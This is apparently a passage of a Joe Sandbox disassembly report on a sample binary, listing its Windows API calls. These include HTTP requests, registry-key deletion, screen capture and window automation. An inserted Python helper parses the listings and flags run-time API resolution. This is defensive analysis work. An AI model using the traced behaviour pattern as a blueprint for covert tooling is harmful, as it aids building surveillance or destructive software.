                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0064C4B0
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0064C4C3
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0064C4D7
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0064C4F0
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0064C533
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0064C549
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0064C554
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0064C584
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0064C5DC
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0064C5F0
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0064C5FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                • String ID:
                                                                                • API String ID: 3800310941-3916222277
                                                                                • Opcode ID: 47d75a1b9d88836c88431affd5ed31ff0cbd4d52412c4807ef33d2d86d8865d2
                                                                                • Instruction ID: 14fe998abc292f6296f30d2a20ba095a65fd2b0fcee1be4f10e5ddf96c7b9469
                                                                                • Opcode Fuzzy Hash: 47d75a1b9d88836c88431affd5ed31ff0cbd4d52412c4807ef33d2d86d8865d2
                                                                                • Instruction Fuzzy Hash: 02516EB0501608BFDB619F64C948ABB7BFEFF08764F008419F98596310DB74E954DB60
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00668592
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685A2
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685AD
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685BA
                                                                                • GlobalLock.KERNEL32(00000000), ref: 006685C8
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685D7
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 006685E0
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685E7
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685F8
                                                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0066FC38,?), ref: 00668611
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00668621
                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00668641
                                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00668671
                                                                                • DeleteObject.GDI32(?), ref: 00668699
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006686AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 84ace92714139ebbb2d2668daad19d16867ea6c526a8162ac60c9c438deefe0d
                                                                                • Instruction ID: 97f7c04cb81f6411bc78b12de212852d7ba3e1668879a4c28493aeb7c1e56ff9
                                                                                • Opcode Fuzzy Hash: 84ace92714139ebbb2d2668daad19d16867ea6c526a8162ac60c9c438deefe0d
                                                                                • Instruction Fuzzy Hash: A3411975600604BFDB119FA5DC48EAA7BBEEF89B21F104159F946E7260DB709E01CB60
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000000), ref: 00641502
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0064150B
                                                                                • VariantClear.OLEAUT32(?), ref: 00641517
                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006415FB
                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00641657
                                                                                • VariantInit.OLEAUT32(?), ref: 00641708
                                                                                • SysFreeString.OLEAUT32(?), ref: 0064178C
                                                                                • VariantClear.OLEAUT32(?), ref: 006417D8
                                                                                • VariantClear.OLEAUT32(?), ref: 006417E7
                                                                                • VariantInit.OLEAUT32(00000000), ref: 00641823
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 1234038744-3931177956
                                                                                • Opcode ID: 1d37bda74e5566d68e3a9e47369c5933b3abaace51c759256df02d1b5bf82c10
                                                                                • Instruction ID: 8ca4107cefe6b017d48ee7f1cc2250ec657f0f61f0b064d7aa9e9d267ef85d8b
                                                                                • Opcode Fuzzy Hash: 1d37bda74e5566d68e3a9e47369c5933b3abaace51c759256df02d1b5bf82c10
                                                                                • Instruction Fuzzy Hash: 21D1E5B1600516DBDB18EF65D889BBDBBB6BF86700F148056F446AF680DB30EC82DB51
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 0065C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065B6AE,?,?), ref: 0065C9B5
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065C9F1
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA68
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065B6F4
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065B772
                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 0065B80A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065B87E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065B89C
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0065B8F2
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0065B904
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0065B922
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0065B983
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065B994
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 146587525-4033151799
                                                                                • Opcode ID: cd9f01e1d4a0f7dcde29da5ab429536be5a5343bafa2aed195209cd6cd2cf694
                                                                                • Instruction ID: 87462284557be69eb017b1d384b24d551cafcf3acc45d898fbb8772dea2200e2
                                                                                • Opcode Fuzzy Hash: cd9f01e1d4a0f7dcde29da5ab429536be5a5343bafa2aed195209cd6cd2cf694
                                                                                • Instruction Fuzzy Hash: 9EC16E30204202AFD720DF18C495F6ABBE6BF85319F14955DF8968B3A2C771ED49CB91
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 006525D8
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006525E8
                                                                                • CreateCompatibleDC.GDI32(?), ref: 006525F4
                                                                                • SelectObject.GDI32(00000000,?), ref: 00652601
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0065266D
                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006526AC
                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006526D0
                                                                                • SelectObject.GDI32(?,?), ref: 006526D8
                                                                                • DeleteObject.GDI32(?), ref: 006526E1
                                                                                • DeleteDC.GDI32(?), ref: 006526E8
                                                                                • ReleaseDC.USER32(00000000,?), ref: 006526F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: a652e560098a6fe9d3f48a7895e45e56f1e693ae5b3b1ffe5f6266801375ce8b
                                                                                • Instruction ID: 9662a6b8ba72b60abccc21088b2b0d60fc0ef2e980b1c1a8010d752165eca047
                                                                                • Opcode Fuzzy Hash: a652e560098a6fe9d3f48a7895e45e56f1e693ae5b3b1ffe5f6266801375ce8b
                                                                                • Instruction Fuzzy Hash: 2B61F475D0061AEFCF04CFA4D894AAEBBF6FF48310F208529E955A7250D771A941CF94
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 0060DAA1
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D659
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D66B
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D67D
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D68F
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6A1
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6B3
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6C5
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6D7
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6E9
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6FB
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D70D
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D71F
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D731
                                                                                • _free.LIBCMT ref: 0060DA96
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 0060DAB8
                                                                                • _free.LIBCMT ref: 0060DACD
                                                                                • _free.LIBCMT ref: 0060DAD8
                                                                                • _free.LIBCMT ref: 0060DAFA
                                                                                • _free.LIBCMT ref: 0060DB0D
                                                                                • _free.LIBCMT ref: 0060DB1B
                                                                                • _free.LIBCMT ref: 0060DB26
                                                                                • _free.LIBCMT ref: 0060DB5E
                                                                                • _free.LIBCMT ref: 0060DB65
                                                                                • _free.LIBCMT ref: 0060DB82
                                                                                • _free.LIBCMT ref: 0060DB9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: aaa64df1ad360d0d096e88a3f1a4fbe14835bb136f56c49d9f1fbf95a121caad
                                                                                • Instruction ID: 5e9f70f856a4960c56b77a1b02231d038bc5addbc136e087ce959cd0b5137088
                                                                                • Opcode Fuzzy Hash: aaa64df1ad360d0d096e88a3f1a4fbe14835bb136f56c49d9f1fbf95a121caad
                                                                                • Instruction Fuzzy Hash: BD317C716842069FEB69AAB9E845B9B77EAFF00710F204A1DE449D72D1DB30EC40C724
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0063369C
                                                                                • _wcslen.LIBCMT ref: 006336A7
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00633797
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0063380C
                                                                                • GetDlgCtrlID.USER32(?), ref: 0063385D
                                                                                • GetWindowRect.USER32(?,?), ref: 00633882
                                                                                • GetParent.USER32(?), ref: 006338A0
                                                                                • ScreenToClient.USER32(00000000), ref: 006338A7
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00633921
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0063395D
                                                                                Similarity
                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                • String ID: %s%u
                                                                                • API String ID: 4010501982-679674701
                                                                                • Opcode ID: 80008d215d2383fb10d2a609a4ac87a2cab88421131c42117caca905ff248a44
                                                                                • Instruction ID: 01103dd22312446eaf7fade9c150c69ad77354cdeaec62f9831198b677e06732
                                                                                • Opcode Fuzzy Hash: 80008d215d2383fb10d2a609a4ac87a2cab88421131c42117caca905ff248a44
                                                                                • Instruction Fuzzy Hash: D6919171204616EFD719DF24C885BEAF7AAFF44350F004629FA99C6290EB70EA45CBD1
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00634994
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 006349DA
                                                                                • _wcslen.LIBCMT ref: 006349EB
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 006349F7
                                                                                • _wcsstr.LIBVCRUNTIME ref: 00634A2C
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00634A64
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00634A9D
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00634AE6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00634B20
                                                                                • GetWindowRect.USER32(?,?), ref: 00634B8B
                                                                                Similarity
                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                • String ID: ThumbnailClass
                                                                                • API String ID: 1311036022-1241985126
                                                                                • Opcode ID: 8e9b11e494c033497b9640c06a3387b912d21c6cab9e8346e96d938d5c7a2270
                                                                                • Instruction ID: 19d455fee6c709d602f0f80563e8ec6a33eb4765cd08333aed2ec04029af0cb8
                                                                                • Opcode Fuzzy Hash: 8e9b11e494c033497b9640c06a3387b912d21c6cab9e8346e96d938d5c7a2270
                                                                                • Instruction Fuzzy Hash: 8491AE711042069BDB04CF14C985BAAFBEAFF84314F04846AFD869A296DF34ED45CBA1
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00668D5A
                                                                                • GetFocus.USER32 ref: 00668D6A
                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00668D75
                                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00668E1D
                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00668ECF
                                                                                • GetMenuItemCount.USER32(?), ref: 00668EEC
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00668EFC
                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00668F2E
                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00668F70
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00668FA1
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                • String ID: 0
                                                                                • API String ID: 1026556194-4108050209
                                                                                • Opcode ID: b7a62bef0d4ea5b3004d35c22af330dec226314555e20c01a0d9942ad27c096d
                                                                                • Instruction ID: 54c6cd0170db8b251b28477b438c278d34397e09507125ff083d3c8a4a04b9bd
                                                                                • Opcode Fuzzy Hash: b7a62bef0d4ea5b3004d35c22af330dec226314555e20c01a0d9942ad27c096d
                                                                                • Instruction Fuzzy Hash: 94819F71508341AFDB10DF24D884AAB7BEBFF89354F140A1EF98597291DB71E901CBA2
                                                                                APIs
                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0063DC20
                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0063DC46
                                                                                • _wcslen.LIBCMT ref: 0063DC50
                                                                                • _wcsstr.LIBVCRUNTIME ref: 0063DCA0
                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0063DCBC
                                                                                Similarity
                                                                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 1939486746-1459072770
                                                                                • Opcode ID: 4bfef0b9fe71b9782ee7ed925d7105bbd9958982b807045e17137018d7599296
                                                                                • Instruction ID: 064142613ef7e04d342205c53b66bedc5510440d8022095e48f8cfd6b556bfb3
                                                                                • Opcode Fuzzy Hash: 4bfef0b9fe71b9782ee7ed925d7105bbd9958982b807045e17137018d7599296
                                                                                • Instruction Fuzzy Hash: 8A4118329407067ADB14AB75DC4BEFF7B6DFF82760F10006AFA00A6182EB75990197B4
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0065CC64
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0065CC8D
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0065CD48
                                                                                  • Part of subcall function 0065CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0065CCAA
                                                                                  • Part of subcall function 0065CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0065CCBD
                                                                                  • Part of subcall function 0065CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0065CCCF
                                                                                  • Part of subcall function 0065CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0065CD05
                                                                                  • Part of subcall function 0065CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0065CD28
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0065CCF3
                                                                                Similarity
                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2734957052-4033151799
                                                                                • Opcode ID: be70dd3e98781277891bf0b8bf08dbfe1106c7aa1aa4d4adc42e75c086b44cc4
                                                                                • Instruction ID: dfd478e9582f15ca6f1693502117e16ebc136d62a2a166c5a68ee0b878cc026d
                                                                                • Opcode Fuzzy Hash: be70dd3e98781277891bf0b8bf08dbfe1106c7aa1aa4d4adc42e75c086b44cc4
                                                                                • Instruction Fuzzy Hash: 3231A171901229BFDB209B94DC88EFFBB7EEF01761F000165F945E2200D7B08A49DAA0
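The function above is a registry-key delete loop (RegEnumKeyExW and RegOpenKeyExW driving the recursion) that resolves RegDeleteKeyExW at run time through LoadLibraryA and GetProcAddress and otherwise calls RegDeleteKeyW. Records like this are easier to triage by script than by eye. What follows is an added example and not part of this Joe Sandbox report, nor Joe Sandbox or AutoIt code: a Python parser for the bullet lines in the exact form they are rendered on this page, with one heuristic layered on top that flags a function as doing dynamic API resolution when the same listing both loads a library and resolves a symbol by name. The line format, the ApiCall record and the heuristic are assumptions of this example; the sample input is the nine API lines of this function copied from the report.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox disassembly export.

Added triage helper (not Joe Sandbox code).  It handles the two line shapes
seen on the page:
    • Api.MODULE(arg,arg,...), ref: ADDR
    • Api.MODULE ref: ADDR
optionally prefixed with "Part of subcall function ADDR:".
"""
import re
from dataclasses import dataclass
from typing import List, Optional

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"          # argument list is optional
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Sample input: the nine API lines of the registry-delete function, copied
# from the report above (constructed test data for this example).
SAMPLE_LISTING = """
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0065CC64
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0065CC8D
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0065CD48
• Part of subcall function 0065CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0065CCAA
• Part of subcall function 0065CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0065CCBD
• Part of subcall function 0065CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0065CCCF
• Part of subcall function 0065CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0065CD05
• Part of subcall function 0065CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0065CD28
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0065CCF3
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw tokens; "?" means the plugin could not recover the value
    ref: str                   # call-site address
    subcall: Optional[str]     # callee address when the call sits in a subcall, else None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines into ApiCall records; headings and blanks are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref"), m.group("sub")))
    return calls


def modules_used(calls: List[ApiCall]) -> List[str]:
    return sorted({c.module for c in calls})


def dynamically_resolved_symbols(calls: List[ApiCall]) -> List[str]:
    """Names passed to GetProcAddress, reported only when the same listing also
    loads a library (heuristic for run-time API resolution).  A GetProcAddress
    on its own is not flagged, and a "?" name cannot be reported."""
    if not any(c.api.startswith("LoadLibrary") for c in calls):
        return []
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] != "?"]


def registry_deletes(calls: List[ApiCall]) -> List[str]:
    """Registry deletion APIs called directly (import table), in listing order."""
    return [c.api for c in calls if c.api.startswith("RegDelete")]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LISTING)
    print(f"{len(parsed)} calls across {modules_used(parsed)}")
    print("resolved at run time:", dynamically_resolved_symbols(parsed))
    print("direct registry deletes:", registry_deletes(parsed))
```

The heuristic is a triage signal, not a verdict: a run-time lookup of RegDeleteKeyExW next to a direct RegDeleteKeyW call is exactly what a compatibility shim that prefers the newer API and falls back to the older one looks like, so a hit is read together with which symbol is resolved and which other calls surround it, not on its own.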
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 0063E6B4
                                                                                  • Part of subcall function 005EE551: timeGetTime.WINMM(?,?,0063E6D4), ref: 005EE555
                                                                                • Sleep.KERNEL32(0000000A), ref: 0063E6E1
                                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0063E705
                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0063E727
                                                                                • SetActiveWindow.USER32 ref: 0063E746
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0063E754
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0063E773
                                                                                • Sleep.KERNEL32(000000FA), ref: 0063E77E
                                                                                • IsWindow.USER32 ref: 0063E78A
                                                                                • EndDialog.USER32(00000000), ref: 0063E79B
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: 97e801ec6818b365dcc25f22faf7a2578359f7b0b37dd5be96c38cc3226a0a70
                                                                                • Instruction ID: 9aa5ba4d69829e614cace606a023c2c634144f903b6567ad1014d7e6fa1081ff
                                                                                • Opcode Fuzzy Hash: 97e801ec6818b365dcc25f22faf7a2578359f7b0b37dd5be96c38cc3226a0a70
                                                                                • Instruction Fuzzy Hash: D9218770280605AFEB106F64ECA9A353B6BF756358F103425F455826E1DBB2BC50DF74
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0063EA5D
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0063EA73
